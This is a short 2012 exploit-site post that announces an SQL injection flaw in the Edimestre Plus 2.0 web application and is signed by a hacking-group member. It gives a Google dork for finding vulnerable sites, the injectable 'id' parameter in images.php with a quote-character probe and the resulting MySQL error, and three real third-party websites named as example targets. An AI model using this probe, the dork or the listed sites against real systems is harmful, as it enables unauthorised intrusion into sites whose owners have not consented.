Home / exploits Edimestre Plus 2.0 SQL Injection
Posted on 27 June 2012
# Exploit Title: Edimestre Plus 2.0 - Sql injection Vulnerability # Date: 24 June 2012 # Author: Dark-Puzzle # Vendor Website : http://www.edimestre.ca/ # Version: 2.0 previous versions may also be vulnerable . # Category: Webapps/0day # Google dork: intext:"Powered by Edimaster Plus" inurl:images.php # Tested on: Windows Xp Sp2 , Backtrack 5 . Exploit : http://www.example.com/modules/images/images.php?id=1&image=213&langue=en&menu=3 Howto: the string (') must be added to ?id=7' without deleting the other functions "&image=213&langue=en&menu=3" else the sql error won't show up . Example : http://www.example.com/modules/images/images.php?id=1'&image=213&langue=en&menu=3 error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND (langue = 'en') ORDER BY length(texteurl) DESC' at line 2 +other stuff below . Example Sites : http://www.pedxray.com/modules/images/images.php?id=7'&image=335&langue=en&menu=31 http://netic.ca/modules/images/images.php?id=17'&image=379&langue=en http://www.bertrandrpitt.net/modules/images/images.php?id=3'&image=136&langue=en More At Google . DARK-PUZZLE (Souhail) Follow me : https://www.facebook.com/dark.puzzle Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army Greetz to : M.C.A , Team-Hunter , Dr.napst3r , Jigs@w ...
